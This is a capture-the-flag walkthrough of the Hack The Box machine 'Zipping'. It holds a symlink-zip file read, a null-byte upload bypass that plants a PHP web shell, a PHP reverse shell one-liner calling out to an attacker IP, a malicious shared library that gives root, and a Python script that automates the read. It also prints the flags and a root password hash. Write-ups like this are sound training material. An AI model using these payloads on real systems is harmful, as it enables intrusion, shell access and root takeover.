Start by scanning the target:
# nmap -sC -sV -Pn 10.10.11.229
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 11:50 CST
Nmap scan report for 10.10.11.229
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Ubuntu 1ubuntu7.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 9d:6e:ec:02:2d:0f:6a:38:60:c6:aa:ac:1e:e0:c2:84 (ECDSA)
|_  256 eb:95:11:c7:a6:fa:ad:74:ab:a2:c5:f6:a4:02:18:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Ubuntu))
|_http-title: Zipping | Watch store
|_http-server-header: Apache/2.4.54 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds
The site's About section shows that the company makes watches for men and women. Nothing else of interest on the front page, so fuzz for directories:
dirsearch v0.4.2
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.11.229/-_23-09-06_11-58-22.txt
Error Log: /root/.dirsearch/logs/errors-23-09-06_11-58-22.log
Target: http://10.10.11.229/
[ ] Starting:
[403 - 277B - /.ht_wsr.txt ]
[403 - 277B - /.htaccess_orig ]
[403 - 277B - /.htaccess.orig ]
[403 - 277B - /.htaccess_extra ]
[403 - 277B - /.htaccess.bak1 ]
[403 - 277B - /.htaccess.save ]
[403 - 277B - /.htaccess_sc ]
[403 - 277B - /.htaccessOLD2 ]
[403 - 277B - /.htaccessBAK ]
[403 - 277B - /.html ]
[403 - 277B - /.htaccess.sample ]
[403 - 277B - /.htaccessOLD ]
[403 - 277B - /.httr-oauth ]
[403 - 277B - /.htpasswd_test ]
[403 - 277B - /.htm ]
[403 - 277B - /.htpasswds ]
[403 - 277B - /.php ]
[301 - 313B - /assets -> http://10.10.11.229/assets/ ]
[200 - 2KB - /assets/ ]
[200 - 16KB - /index.php ]
[200 - 16KB - /index.php/login/ ]
[403 - 277B - /server-status ]
[403 - 277B - /server-status/ ]
[301 - 311B - /shop -> http://10.10.11.229/shop/ ]
[200 - 5KB - /upload.php ]
[403 - 277B - /uploads/ ]
[301 - 314B - /uploads -> http://10.10.11.229/uploads/ ]
Task Completed
The scan turns up /upload.php. The upload form only accepts zip files, but the archive is extracted on the server, so if we put a symlink inside the archive (with a .pdf name) the extracted link points wherever we like and the web server serves the target file. This is an arbitrary file read (the author calls it an LFI) through the zip upload:
ln -s ../../../../../../../etc/passwd passwd.pdf
zip --symlinks passwd.zip passwd.pdf
After uploading, follow the "pdf" path the page returns and capture the request in a proxy; the response body is the content of the symlink target, here /etc/passwd.
The same read can be pointed at the application itself. Reading upload.php through the symlink gives its source:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Start your development with Creative Design landing page.">
<meta name="author" content="Devcrud">
<title>Zipping | Watch store</title>
<!-- font icons -->
<link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">
<!-- Bootstrap + Creative Design main styles -->
<link rel="stylesheet" href="assets/css/creative-design.css">
</head>
<body data-spy="scroll" data-target=".navbar" data-offset="40" id="home">
<!-- Page Header -->
<header class="header header-mini">
<div class="header-title">Work with Us</div>
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="index.php">Home</a></li>
<li class="breadcrumb-item active" aria-current="page">Work with Us</li>
</ol>
</nav>
</header> <!-- End Of Page Header -->
<section id="work" class="text-center">
<!-- container -->
<div class="container">
<h1>WORK WITH US</h1>
<p class="mb-5">If you are interested in working with us, do not hesitate to send us your curriculum.<br> The application will only accept zip files, inside them there must be a pdf file containing your curriculum.</p>
<?php
if(isset($_POST['submit'])) {
    // Get the uploaded zip file
    $zipFile = $_FILES['zipFile']['tmp_name'];
    if ($_FILES["zipFile"]["size"] > 300000) {
        echo "<p>File size must be less than 300,000 bytes.</p>";
    } else {
        // Create an md5 hash of the zip file
        $fileHash = md5_file($zipFile);
        // Create a new directory for the extracted files
        $uploadDir = "uploads/$fileHash/";
        // Extract the files from the zip
        $zip = new ZipArchive;
        if ($zip->open($zipFile) === true) {
            if ($zip->count() > 1) {
                echo '<p>Please include a single PDF file in the archive.<p>';
            } else {
                // Get the name of the compressed file
                $fileName = $zip->getNameIndex(0);
                if (pathinfo($fileName, PATHINFO_EXTENSION) === "pdf") {
                    mkdir($uploadDir);
                    echo exec('7z e '.$zipFile. ' -o' .$uploadDir. '>/dev/null');
                    echo '<p>File successfully uploaded and unzipped, a staff member will review your resume as soon as possible. Make sure it has been uploaded correctly by accessing the following path:</p><a href="'.$uploadDir.$fileName.'">'.$uploadDir.$fileName.'</a>'.'</p>';
                } else {
                    echo "<p>The unzipped file must have a .pdf extension.</p>";
                }
            }
        } else {
            echo "Error uploading file.";
        }
    }
}
?>
<!-- Submit File -->
<form id="zip-form" enctype="multipart/form-data" method="post" action="upload.php">
<div class="mb-3">
<input type="file" class="form-control" name="zipFile" accept=".zip">
</div>
<button type="submit" class="btn btn-primary" name="submit">Upload</button>
</form><!-- End submit file -->
</div><!-- End of Container-->
</section><!-- End of Contact Section -->
<!-- Section -->
<section class="pb-0">
<!-- Container -->
<div class="container">
<!-- Pre footer -->
<div class="pre-footer">
<ul class="list">
<li class="list-head">
<h6 class="font-weight-bold">ABOUT US</h6>
</li>
<li class="list-body">
<p>Zipping Co. is a company that is dedicated to producing high-quality watches that are both stylish and functional. We are constantly pushing the boundaries of what is possible with watch design and are known for their commitment to innovation and customer service.</p>
<a href="#"><strong class="text-primary">Zipping</strong> <span class="text-dark">Watch Store</span></a>
</li>
</ul>
<ul class="list">
<li class="list-head">
<h6 class="font-weight-bold">USEFUL LINKS</h6>
</li>
<li class="list-body">
<div class="row">
<div class="col">
<a href="#">Link 1</a>
<a href="#">Link 2</a>
<a href="#">Link 3</a>
<a href="#">Link 4</a>
</div>
<div class="col">
<a href="#">Link 5</a>
<a href="#">Link 6</a>
<a href="#">Link 7</a>
<a href="#">Link 8</a>
</div>
</div>
</li>
</ul>
<ul class="list">
<li class="list-head">
<h6 class="font-weight-bold">CONTACT INFO</h6>
</li>
<li class="list-body">
<p>Contact us and we'll get back to you within 24 hours.</p>
<p><i class="ti-location-pin"></i> 12345 Fake ST NoWhere AB Country</p>
<p><i class="ti-email"></i> [email protected]</p>
<div class="social-links">
<a href="javascript:void(0)" class="link"><i class="ti-facebook"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-twitter-alt"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-google"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-pinterest-alt"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-instagram"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-rss"></i></a>
</div>
</li>
</ul>
</div><!-- End of Pre footer -->
<!-- foooter -->
<footer class="footer">
<p>Made by <a href="https://github.com/xdann1">xDaNN1</p>
</footer><!-- End of Footer-->
</div><!--End of Container -->
</section><!-- End of Section -->
</body>
</html>
This is the code behind the file read. The only checks are the archive size, the entry count, and the extension of the first entry's name as returned by pathinfo(). The archive is then handed to 7z, which recreates symlinks on extraction, and the resulting path under uploads/ is served by Apache, which follows the link. Nothing inspects what kind of entry the archive holds.
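The symlink archive built in pure Python, as an added example that is not part of the original writeup or the target's code: it does what the ln -s and zip --symlinks commands above do, and then runs the check upload.php never performs, namely reading the Unix mode stored in each entry's external attributes and flagging symlinks. The entry name passwd.pdf and the relative target are the ones used above; the archive stays in memory.

```python
import io
import stat
import zipfile


def build_symlink_zip(link_name: str, target: str) -> bytes:
    """Equivalent of `ln -s TARGET LINK_NAME && zip --symlinks x.zip LINK_NAME`.

    A symlink is stored as an ordinary entry whose data is the target path and
    whose Unix mode (S_IFLNK | 0777) lives in the high 16 bits of external_attr.
    7z recreates the link on extraction, and Apache then follows it out of uploads/.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3                          # 3 = Unix: mode bits are honoured
        info.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(info, target)                       # link data is just the target path
    return buf.getvalue()


def build_regular_zip(name: str, data: bytes) -> bytes:
    """A benign single-file archive, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def symlink_entries(zip_bytes: bytes):
    """Return (name, target) for every entry whose stored mode is a symlink.

    This is the check missing from upload.php: it looks at the name's extension
    and the entry count, never at the entry type, before calling 7z.
    """
    links = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                links.append((info.filename, zf.read(info).decode()))
    return links


if __name__ == "__main__":
    evil = build_symlink_zip("passwd.pdf", "../../../../../../../etc/passwd")
    print(symlink_entries(evil))        # [('passwd.pdf', '../../../../../../../etc/passwd')]
    with open("passwd.zip", "wb") as f:  # same archive the ln/zip commands above produce
        f.write(evil)
```

A server-side fix would reject any archive for which symlink_entries() is non-empty (or extract with 7z's symlink handling disabled) before touching the entry name at all.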
The code checks that the single entry's name ends in pdf, but the name is checked as a PHP string while the file itself is written to disk by 7z, a C program. If we put a null byte right after .php (test.php\x00.pdf), pathinfo() still sees the whole name and returns "pdf", whereas 7z stops at the null and creates test.php on disk. Create a PHP test file first and zip it; the X in the name is a placeholder for the byte we will overwrite:
https://book.hacktricks.xyz/pentesting-web/file-upload#bypass-file-extensions-checks
<?php echo "jinitaimei"; ?>
zip null.zip test.phpX.pdf
Next, open the archive in hexeditor and overwrite the X with 0x00 (the author locates it at byte 58). A zip stores the entry name twice, in the local file header and in the central directory, so patch both copies before saving.
Upload the patched archive. The returned link points at uploads/<md5>/test.php\x00.pdf; strip the trailing .pdf and request uploads/<md5>/test.php, and the PHP output comes back.
The same trick uploads a PHP web shell, which is then used to launch a reverse shell; remember to URL-encode the command when passing it in the cmd parameter:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>
php -r '$sock=fsockopen("10.10.14.5",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'
That gives a shell. Note that the box runs a scheduled job that deletes uploaded files, so re-upload if the web shell disappears.
User flag: ee453eace87abef17b87c0608c81874e. Then run sudo -l to look for an escalation path:
rektsu@zipping:/home/rektsu$ sudo -l
sudo -l
Matching Defaults entries for rektsu on zipping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User rektsu may run the following commands on zipping:
(ALL) NOPASSWD: /usr/bin/stock
rektsu@zipping:/home/rektsu$
Running strings on the binary reveals a password:
rektsu@zipping:/home/rektsu$ strings /usr/bin/stock
strings /usr/bin/stock
/lib64/ld-linux-x86-64.so.2
mgUa
fgets
stdin
puts
exit
fopen
__libc_start_main
fprintf
dlopen
__isoc99_fscanf
__cxa_finalize
strchr
fclose
__isoc99_scanf
strcmp
__errno_location
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
Hakaize
St0ckM4nager
/root/.stock.csv
Enter the password:
Invalid password, please try again.
================== Menu ==================
1) See the stock
2) Edit the stock
3) Exit the program
Select an option:
You do not have permissions to read the file
File could not be opened.
================== Stock Actual ==================
Colour Black Gold Silver
Amount %-7d %-7d %-7d
Quality Excelent Average Poor
Amount %-9d %-7d %-4d
Exclusive Yes No
Amount %-4d %-4d
Warranty Yes No
================== Edit Stock ==================
Enter the information of the watch you wish to update:
Colour (0: black, 1: gold, 2: silver):
Quality (0: excelent, 1: average, 2: poor):
Exclusivity (0: yes, 1: no):
Warranty (0: yes, 1: no):
Amount:
Error: The information entered is incorrect
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d
The stock has been updated correctly.
;*3$"
GCC: (Debian 12.2.0-3) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
stock.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
__errno_location@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__isoc99_fscanf@GLIBC_2.7
puts@GLIBC_2.2.5
stdin@GLIBC_2.2.5
_edata
fclose@GLIBC_2.2.5
_fini
strchr@GLIBC_2.2.5
fgets@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
dlopen@GLIBC_2.34
fprintf@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
checkAuth
_end
__bss_start
main
fopen@GLIBC_2.2.5
__isoc99_scanf@GLIBC_2.7
exit@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
rektsu@zipping:/home/rektsu$
The password is St0ckM4nager.
Once the correct password is entered, the binary lets you view and edit the stock kept in /root/.stock.csv. Trace it with strace to see what it does after authentication:
rektsu@zipping:/usr/bin$ strace ./stock
strace ./stock
execve("./stock", ["./stock"], 0x7fffc46a3500 /* 16 vars */) = 0
brk(NULL) = 0x55ba794bb000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff80acc340) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a950f000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 4
newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=18225, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 18225, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f67a950a000
close(4) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
read(4, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0"..., 832) = 832
pread64(4, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=2072888, ...}, AT_EMPTY_PATH) = 0
pread64(4, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2117488, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f67a9200000
mmap(0x7f67a9222000, 1544192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x22000) = 0x7f67a9222000
mmap(0x7f67a939b000, 356352, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x19b000) = 0x7f67a939b000
mmap(0x7f67a93f2000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x1f1000) = 0x7f67a93f2000
mmap(0x7f67a93f8000, 53104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f67a93f8000
close(4) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a9507000
arch_prctl(ARCH_SET_FS, 0x7f67a9507740) = 0
set_tid_address(0x7f67a9507a10) = 3332
set_robust_list(0x7f67a9507a20, 24) = 0
rseq(0x7f67a9508060, 0x20, 0, 0x53053053) = 0
mprotect(0x7f67a93f2000, 16384, PROT_READ) = 0
mprotect(0x55ba77512000, 4096, PROT_READ) = 0
mprotect(0x7f67a9545000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7f67a950a000, 18225) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
getrandom("\xea\xb9\xf4\x36\x03\x6f\xa2\x87", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x55ba794bb000
brk(0x55ba794dc000) = 0x55ba794dc000
newfstatat(0, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
write(1, "Enter the password: ", 20Enter the password: ) = 20
read(0, St0ckM4nager
St0ckM4nager
"St0ckM4nager\n", 1024) = 13
openat(AT_FDCWD, "/home/rektsu/.config/libcounter.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
write(1, "\n================== Menu ======="..., 44
================== Menu ==================
) = 44
write(1, "\n", 1
) = 1
write(1, "1) See the stock\n", 171) See the stock
) = 17
write(1, "2) Edit the stock\n", 182) Edit the stock
) = 18
write(1, "3) Exit the program\n", 203) Exit the program
) = 20
write(1, "\n", 1
Right after the password check the program tries to open /home/rektsu/.config/libcounter.so (the dlopen import seen in strings) and gets ENOENT. That directory is under our own home, so we can plant a malicious libcounter.so there; because stock runs under sudo, whatever the library does at load time runs as root.
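Spotting this kind of missing-library load in a trace is a routine check, so here is the filter I would run over strace output, as an added example that is not part of the original writeup: it picks out openat() calls for shared objects that returned ENOENT and pairs each with the directory it would be created in. The sample trace lines are constructed from the output above (one successful open and one unrelated EACCES are included so the filter has something to skip), and the writable-directory list is a constructed stand-in for an os.access() check on the real host.

```python
import os
import re
from typing import List, Tuple

# Constructed sample: lines modelled on the strace run above.
SAMPLE_TRACE = """\
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
openat(AT_FDCWD, "/home/rektsu/.config/libcounter.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/root/.stock.csv", O_RDONLY) = -1 EACCES (Permission denied)
"""

# openat(<dirfd>, "<path>", <flags>...) = -1 ENOENT ...   (optional pid prefix from strace -f)
OPENAT_ENOENT = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?(?:\d+\s+)?openat\(\s*[^,]+,\s*"([^"]+)"[^)]*\)\s*=\s*-1\s+ENOENT'
)
SHARED_OBJECT = re.compile(r"\.so(\.\d+)*$")   # libfoo.so, libc.so.6; not ld.so.preload


def missing_shared_objects(trace: str) -> List[str]:
    """Paths of .so files that openat() could not find, in trace order."""
    found = []
    for line in trace.splitlines():
        m = OPENAT_ENOENT.match(line)
        if m and SHARED_OBJECT.search(os.path.basename(m.group(1))):
            found.append(m.group(1))
    return found


def hijack_candidates(trace: str, writable_dirs: List[str]) -> List[Tuple[str, str]]:
    """Pair each missing .so with its parent directory when we can write there.

    writable_dirs is a constructed list here; on a live host derive it with
    os.access(d, os.W_OK) for each parent directory instead.
    """
    out = []
    for path in missing_shared_objects(trace):
        parent = os.path.dirname(path)
        if parent in writable_dirs:
            out.append((path, parent))
    return out


if __name__ == "__main__":
    for so, where in hijack_candidates(SAMPLE_TRACE, ["/home/rektsu/.config"]):
        print(f"hijackable: {so}  (drop a malicious build in {where})")
```

On the real box the same filter run over `strace -f -e trace=openat sudo /usr/bin/stock` output yields exactly the libcounter.so line; a successful open (return value is a file descriptor) or a non-.so path is ignored.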
Privilege escalation via a malicious shared library, in C:
#include <stdlib.h>
#include <unistd.h>

/* Runs when sudo /usr/bin/stock dlopen()s this file as root: the binary is
   built with -nostartfiles below, so _init is our load-time entry point.
   Make /bin/bash setuid so a plain user can get a root shell with bash -p. */
void _init() {
    setuid(0);
    setgid(0);
    system("chmod u+s /bin/bash");
}
gcc -shared -fPIC -nostartfiles -o libcounter.so lib.c
Copy the result to /home/rektsu/.config/ and run the binary again under sudo; once it loads the library, /bin/bash is setuid root:
bash-5.2$ sudo /usr/bin/stock
Enter the password: St0ckM4nager
================== Menu ==================
1) See the stock
2) Edit the stock
3) Exit the program
Select an option: 3
bash-5.2$ /bin/bash -p
bash-5.2# id
uid=1001(rektsu) gid=1001(rektsu) euid=0(root) groups=1001(rektsu)
bash-5.2#
Root flag: db3ce5545891c0a6c87c229352495f5a. The root entry from /etc/shadow, for the record:
root:$y$j9T$IYa44JPNfCWV4rqT1W1Kj/$xiHZCNOyiAOLgnHZ06gdF9jWPNR9ixmhsCwFu0Hgy9/:19548:0:99999:7:::
A script from an overseas researcher that automates the symlink read (one shot to the user flag):
import os
from bs4 import BeautifulSoup
import requests

# Work in a scratch directory so the symlink and archive do not litter the cwd.
if not os.path.exists("tmp"):
    os.mkdir("tmp")
file_to_read = input("File to read: ")
print("Creating symlink..")
os.chdir("tmp/")
# The entry name must end in .pdf to pass pathinfo(); --symlinks stores the
# link itself rather than the target's contents.
os.system(f"ln -s {file_to_read} symlink.pdf")
print("Zipping..")
os.system("zip -r --symlinks sym.zip symlink.pdf")
os.system("rm symlink.pdf && cp sym.zip ../")
print("Done! Zip file: sym.zip")
print("Uploading file..")
MIP = "10.10.11.229"
file = {
    'zipFile': ('sym.zip', open('sym.zip', 'rb'), 'application/zip'),
    'submit': (None, '')
}
headers = {"Host": MIP, "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"}
s = requests.Session()
r = s.get(f"http://{MIP}", headers=headers)
r = s.get(f"http://{MIP}/upload.php", headers=headers)
r = s.post(f"http://{MIP}/upload.php", files=file, headers=headers)
# The response links to uploads/<md5 of the zip>/symlink.pdf; pull the hash out.
soup = BeautifulSoup(r.text, features="lxml")
uuid = ""
for a in soup.find_all("a", href=True):
    if "uploads" in a['href']:
        uuid = a['href'].split("/")[1]
print("File UUID: ", uuid)
print("\nReading file..")
# Apache follows the extracted symlink, so this returns the target file's contents.
r = s.get(f"http://{MIP}/uploads/{uuid}/symlink.pdf")
print(r.text)
Originally published on the WeChat official account hades zorejt: HTB-Zipping notes